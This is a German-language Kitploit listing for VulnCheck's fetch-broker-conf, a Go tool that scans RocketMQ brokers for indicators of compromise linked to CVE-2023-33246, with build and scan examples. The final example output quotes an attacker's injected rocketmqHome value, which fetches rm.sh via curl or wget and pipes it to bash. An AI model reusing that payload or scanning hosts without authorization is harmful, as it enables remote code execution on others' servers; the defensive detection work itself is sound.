Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
fetch-broker-conf — Ein go-exploit zum Abrufen der RocketMQ-Broker-Konfiguration, um Indikatoren für Kompromittierung für CVE-2023-33246 zu entdecken. | Kitploit
Tools/GitHubGitHub/vulncheck-oss/fetch-broker-conf
Management von Indicators of Compromise (IOC)SchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstestsIncident Response
GitHubvulncheck-oss/fetch-broker-conf

fetch-broker-conf

Ein go-exploit zum Abrufen der RocketMQ-Broker-Konfiguration, um Indikatoren für Kompromittierung für CVE-2023-33246 zu entdecken.

Repository anzeigen
51vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Broker-Konfiguration abrufen

Broker-Konfiguration abrufen versucht, die RocketMQ-Broker-Konfiguration herunterzuladen, um nach Indikatoren für eine Kompromittierung in der Variable rocketmqHome zu suchen. Diese Variable wird von verschiedenen Angreifern verwendet, um Code über CVE-2023-33246 auszuführen. Weitere Einzelheiten finden Sie im VulnCheck-Blog.

Kompilieren

Sie können die Makefile verwenden, um einen Docker-Container zu erstellen:

root@kitploit:~
make docker

Oder, falls Sie eine Go-Build-Umgebung bereit haben, einfach make verwenden:

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ make
gofmt -d -w main.go
golangci-lint run --fix main.go
GOOS=linux GOARCH=arm64 go build -o build/main_linux-arm64 main.go

Nutzung

Das Tool basiert auf go-exploit, daher gibt es mehrere Möglichkeiten, Ziele zum Scannen anzugeben. Eine vollständige Beschreibung finden Sie in der Scan-Dokumentation des Projekts. Im Folgenden finden Sie jedoch einige Beispiele:

Einen Host scannen

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhost 10.9.49.143 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:27:48.567836165-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}

Mehrere Hosts scannen

root@kitploit:~
albinolobster@mournland:~/fetch-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts 10.9.49.143,10.9.49.150 -rport 10911 -log-json true | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-09-05T05:34:27.505747211-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.143",
  "port": 10911
}
{
  "time": "2023-09-05T05:34:27.802345043-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "/rocketmq-all-5.1.0-bin-release",
  "host": "10.9.49.150",
  "port": 10911
}

Scannen einer Datei mit Hosts über einen Proxy

go-exploit bietet die Möglichkeit, über eine bereitgestellte Ziel-CSV zu scannen, wobei die CSV wie folgt aussieht: host, port, anything if ssl is enabled (das SSL-Feld wird jedoch ignoriert, wenn -a verwendet wird). Es bietet auch die Möglichkeit, über einen Proxy zu scannen. Der Befehl funktioniert wie folgt (beachten Sie, dass -a die SSL-Erkennung ist):

root@kitploit:~
albinolobster@mournland:~/rocketmq-broker-conf$ ./build/main_linux-arm64 -a -e -rhosts-file /tmp/rocketmq.csv -proxy socks5://127.0.0.1:9050 -log-json true 2>/dev/null | jq 'select(.msg == "Extracted the variable")'
{
  "time": "2023-08-31T13:45:35.781849255-04:00",
  "level": "SUCCESS",
  "msg": "Extracted the variable",
  "rocketmqHome": "-c $@|sh . echo (curl -s x.x.x.x/rm.sh||wget -q -O- x.x.x.x/rm.sh)|bash;",
  "host": "x.x.x.x",
  "port": 10909
}
Tool herunterladen